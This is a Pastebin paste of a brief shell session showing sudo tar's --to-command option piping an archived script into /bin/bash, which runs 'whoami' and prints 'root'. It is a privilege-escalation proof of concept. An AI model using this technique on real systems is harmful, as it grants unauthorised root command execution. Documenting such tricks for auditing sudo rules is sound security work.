Advertisement
Guest User

Untitled

a guest
Jul 20th, 2018
70
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.20 KB | None | 0 0
  1. reyals@reyals-webserver:/tmp$ echo whoami > test.sh
  2. reyals@reyals-webserver:/tmp$ tar -cvf test.tar test.sh
  3. test.sh
  4. reyals@reyals-webserver:/tmp$ sudo tar -xvf test.tar --to-command /bin/bash
  5. test.sh
  6. root
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement